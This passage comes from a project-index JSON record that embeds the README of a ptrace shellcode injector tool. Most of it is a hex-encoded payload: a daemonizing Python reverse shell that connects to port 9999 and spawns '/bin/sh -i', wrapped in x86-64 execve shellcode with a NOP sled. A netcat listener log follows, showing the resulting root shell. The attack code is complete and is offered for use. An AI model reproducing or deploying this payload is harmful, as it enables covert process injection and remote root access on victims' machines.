x20\\x20\\x20\\x20\\x20\\x73\\x79\\x73\\x2e\\x65\\x78\\x69\\x74\\x28\\x30\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x63\\x68\\x64\\x69\\x72\\x28\\x22\\x2f\\x22\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x73\\x65\\x74\\x73\\x69\\x64\\x28\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x75\\x6d\\x61\\x73\\x6b\\x28\\x30\\x29\\x0a\\x0a\\x64\\x72\\x67\\x70\\x69\\x64\\x20\\x3d\\x20\\x6f\\x73\\x2e\\x66\\x6f\\x72\\x6b\\x28\\x29\\x0a\\x69\\x66\\x20\\x64\\x72\\x67\\x70\\x69\\x64\\x20\\x3e\\x20\\x30\\x3a\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x73\\x79\\x73\\x2e\\x65\\x78\\x69\\x74\\x28\\x30\\x29\\x0a\\x0a\\x73\\x79\\x73\\x2e\\x73\\x74\\x64\\x6f\\x75\\x74\\x2e\\x66\\x6c\\x75\\x73\\x68\\x28\\x29\\x0a\\x0a\\x73\\x79\\x73\\x2e\\x73\\x74\\x64\\x65\\x72\\x72\\x2e\\x66\\x6c\\x75\\x73\\x68\\x28\\x29\\x0a\\x0a\\x66\\x64\\x72\\x65\\x67\\x20\\x3d\\x20\\x6f\\x70\\x65\\x6e\\x28\\x22\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x22\\x2c\\x20\\x22\\x77\\x22\\x29\\x0a\\x0a\\x73\\x79\\x73\\x2e\\x73\\x74\\x64\\x6f\\x75\\x74\\x20\\x3d\\x20\\x66\\x64\\x72\\x65\\x67\\x0a\\x0a\\x73\\x79\\x73\\x2e\\x73\\x74\\x64\\x65\\x72\\x72\\x20\\x3d\\x20\\x66\\x64\\x72\\x65\\x67\\x0a\\x0a\\x73\\x64\\x72\\x65\\x67\\x73\\x3d\\x73\\x6f\\x63\\x6b\\x65\\x74\\x2e\\x73\\x6f\\x63\\x6b\\x65\\x74\\x28\\x73\\x6f\\x63\\x6b\\x65\\x74\\x2e\\x41\\x46\\x5f\\x49\\x4e\\x45\\x54\\x2c\\x73\\x6f\\x63\\x6b\\x65\\x74\\x2e\\x53\\x4f\\x43\\x4b\\x5f\\x53\\x54\\x52\\x45\\x41\\x4d\\x29\\x0a\\x0a\\x73\\x64\\x72\\x65\\x67\\x73\\x2e\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x28\\x28\\x73\\x74\\x72\\x28\\x30\\x78\\x37\\x66\\x30\\x30\\x30\\x30\\x30\\x31\\x29\\x2c\\x39\\x39\\x39\\x39\\x29\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x64\\x75\\x70\\x32\\x28\\x73\\x64\\x72\\x65\\x67\\x73\\x2e\\x66\\x69\\x6c\\x65\\x6e\\x6f\\x28\\x29\\x2c\\x30\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x64\\x75\\x70\\x32\\x28\\x73\\x64\\x72\\x65\\x67\\x73\\x2e\\x66\\x69\\x6c\\x65\\x6e\\x6f\\x28\\x29\\x2c\\x31\\x29\\x0a\\x0a\\x6f\\x73\\x2e\\x64\\x75\\x70\\x32\\x28\\x73\\x64\\x72\\x65\\x67\\x73\\x2e\\x66\\x69\\x6c\\x65\\x6e\\x6f\\x28\\x29\\x2c\\x32\\x29\\x0a\\x0a\\x70\\x3d\\x73\\x75\\x62\\x70\\x72\\x6f\\x63\\x65\\x73\\x73\\x2e\\x63\\x61\\x6c\\x6c\\x28\\x5b\\x22\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x22\\x2c\\x22\\x2d\\x69\\x22\\x5d\\x29\\x0a\\x22\\x22\\x22\\x29\\x00\\xe8\\x03\\x00\\x00\\x00\\x2d\\x63\\x00\\xe8\\x0c\\x00\\x00\\x00\\x2f\\x62\\x69\\x6e\\x2f\\x70\\x79\\x74\\x68\\x6f\\x6e\\x00\\x48\\x8d\\x05\\x21\\x00\\x00\\x00\\x50\\x48\\x31\\xd2\\x48\\x89\\xe6\\x48\\x8d\\x3d\\x13\\x00\\x00\\x00\\xb8\\x3b\\x00\\x00\\x00\\x0f\\x05\\xb8\\x3c\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x00\\x0f\\x05\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x00\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n```\n\n```\ndreg@51.195.45.136:~# nc -lvp 9999\nlistening on [any] 9999 ...\nconnect to [127.0.0.1] from fr33project.org [127.0.0.1] 33622\n/bin/sh: 0: can't access tty; job control turned off\n# whoami\nroot\n# id\nuid=0(root) gid=0(root) groups=0(root)\n```\n\n# Contributors\n* micronn: pyrev64 - https://github.com/micronn https://twitter.com/micronn386\n","funding_links":["https://github.com/sponsors/therealdreg","https://patreon.com/dreg","https://www.paypal.me/therealdreg"],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftherealdreg%2Fdrx_ptrace_shellcode_injector","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftherealdreg%2Fdrx_ptrace_shellcode_injector","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftherealdreg%2Fdrx_ptrace_shellcode_injector/lists"}